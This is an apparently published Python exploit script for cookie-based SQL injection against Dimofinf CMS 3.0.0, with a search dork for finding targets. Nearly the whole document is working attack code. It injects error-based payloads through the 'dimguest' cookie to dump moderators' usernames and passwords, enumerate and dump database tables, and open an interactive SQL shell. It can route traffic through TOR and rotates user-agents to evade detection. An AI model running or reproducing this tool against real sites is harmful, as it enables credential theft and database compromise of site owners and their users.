|
# Dimofinf CMS Automatic Cookie SQL Injection exploit
# Google Dork: intext:"Powered by Dimofinf"
# Date: 19/11/2015
# Author: D35m0nd142
# Software link: http://www.dimofinf.net
# Version: 3.0.0
# Tested on: Dimofinf version 3.0.0
# Sometimes it happens that the vulnerability allow you to get moderators' username and password but not the list of tables and columns
# or viceversa; So if one of them does not work, you could try the other one anyway.
#!/usr/bin/python
import socks
import socket
import requests
import sys,os,time
from random import randint
check = "Duplicate entry '"
tor_addr = "127.0.0.1"
tor_port = 9150
agents = ["Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36",
"IBM WebExplorer /v0.94","Mozilla/5.0 (Windows; U; Windows NT 6.1; x64; fr; rv:1.9.2.13) Gecko/20101203 Firebird/3.6.13",
"Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"]
rand = randint(0,9)
url = ""
headers = {'User-Agent':agents[rand%len(agents)]}
def removeDot(s):
return s[1:]
def extract(out):
start = 0
for x in range(0,len(out)-len(check)):
beset = True
for k in range(0,17):
if(out[x+k] != check[k]):
beset = False
if(beset):
start = x+17
break
got = ""
for x in range(start,len(out)):
if(out[x] == '~'):
break
got += out[x]
return got
def req(cookies):
global headers
r = requests.get(url,cookies=cookie,headers=headers)
out = r.text
return out
print "\n-----------------------------------------------------------"
print "Dimofinf CMS v3.0.0 Automatic Cookie SQL Injection exploit"
print "Author: D35m0nd142"
print "-----------------------------------------------------------"
url = raw_input("\nEnter URL -> ")
if("http" not in url):
url = "http://%s" %url
tor = raw_input("Do you want to use TOR? (y/n) ")
if(tor == "y" or tor == "Y" or tor == "yes"):
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, tor_addr, tor_port)
socket.socket = socks.socksocket
except requests.ConnectionError as e:
print "[ERROR] Could not connect to TOR"
sys.exit(1)
session = requests.Session()
response = session.get(url)
s = str(session.cookies.get_dict())
if("dimguest" in s):
i = 0
print "\n[+] 'dimguest' cookie found. Checking exploitability.."
cookie = {'dimguest':'1\''}
r = requests.get(url,cookies=cookie,headers=headers)
choice = "nope"
if("Database Error" in r.text and "Invalid SQL" in r.text and "You have an error in your SQL" in r.text):
print "[+] Target seems to be exploitable (SQL error found)."
cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select user()),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#'}
out = req(cookie)
current = extract(out)
if(len(current) < 70):
print "[+] Current User: %s" %(removeDot(current))
else:
print "[+] Current User: ?"
print "\n----------------------------------------"
print " 1) Get moderators' usernames:passwords"
print " 2) Browse DB (wizard)"
print " 3) SQL shell (difficult)"
print "----------------------------------------"
choice = raw_input(" -> ")
print ""
if(choice == "1"):
cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(username,0x3a,password) from moderators limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i}
out = req(cookie)
while(check in out):
got = extract(out)
if(len(got) > 0):
print "[+] GOT: '%s'" %(removeDot(got))
i += 1
cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(username,0x3a,password) from moderators limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i}
out = req(cookie)
elif(choice == "2"):
print "[*] Gathering tables..\n"
cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(table_name) from information_schema.tables where table_schema=database() limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i}
out = req(cookie)
while(check in out):
got = extract(out)
if(len(got) > 0):
print "[Table] '%s'" %(removeDot(got))
i += 1
cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(table_name) from information_schema.tables where table_schema=database() limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i}
out = req(cookie)
if(i == 0):
print "[-] Any table found :("
tables = raw_input("\nEnter the tables (separated by ',') of which you want the columns -> ")
mytables = []
tmp = ""
for x in range(0,len(tables)):
if(tables[x] == ',' or x == len(tables)-1):
if(x == len(tables)-1):
tmp += tables[x]
mytables.append(tmp)
tmp = ""
else:
tmp += tables[x]
for table in mytables:
col_check = []
k = 0
print "\n[+] Columns in '%s':\n" %table
cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(column_name) from information_schema.columns where table_name=\'%s\' limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %(table,k)}
out = req(cookie)
while(check in out):
got = extract(out)
if(got in col_check):
break
if(len(got) > 0):
col_check.append(got)
print " [Column] '%s'" %(removeDot(got))
k += 1
cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(column_name) from information_schema.columns where table_name=\'%s\' limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %(table,k)}
out = req(cookie)
if(k == 0):
print "[-] Any column found :("
dump = "nope"
while(dump != "exit" and dump != "quit"):
dump = raw_input("\nEnter the table and columns you want to dump (ex: table_name:column1,column2) -> ")
if(dump == "exit" or dump == "quit"):
break
gotTable = False
table = ""
cols = []
col = ""
for x in range(0,len(dump)):
if(gotTable is False and dump[x] == ':'):
gotTable = True
x += 1
if(gotTable is False):
table += dump[x]
else:
if(dump[x] == ',' or x == len(dump)-1):
if(x == len(dump)-1):
col += dump[x]
cols.append(col)
col = ""
else:
col += dump[x]
if(len(cols) > 0):
cols[0] = (cols[0])[1:]
print cols
print "\n[*] Dumping..\n"
query = "1' and (select 1 from (select count(*),concat(0x3a,(select Concat("
for colu in cols:
query += "%s,0x3a," %colu
query = query[:-1]
z = 0
query += ") from %s limit " %table
while(True):
snip = "%s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#" %z
z += 1
myquery = query+snip
cookie = {'dimguest':myquery}
out = req(cookie)
if(check not in out):
break
got = extract(out)
print "[Dump]: '%s'" %(removeDot(got))
print ""
elif(choice == "3"):
print "[*] Opening SQL shell..\n"
time.sleep(0.6)
cmd = ""
while(cmd != "exit" and cmd != "quit"):
cmd = raw_input("SQL-shell> ")
if(cmd == "exit" or cmd == "quit"):
break
cookie = {'dimguest':'1\' and (%s)#' %cmd}
out = req(cookie)
got = extract(out)
print "qui"
print "[+] GOT: '%s'\n" %(removeDot(got))
else:
print "[INPUT ERROR] You entered a not valid choice!"
sys.exit(1)
if(i==0 and choice != "3"):
print "[-] '%s' not vulnerable, or patched." %url
else:
print "\n[+] Target not vulnerable. (cookie 'dimguest' not found.)"
|
推荐
评论(0条)
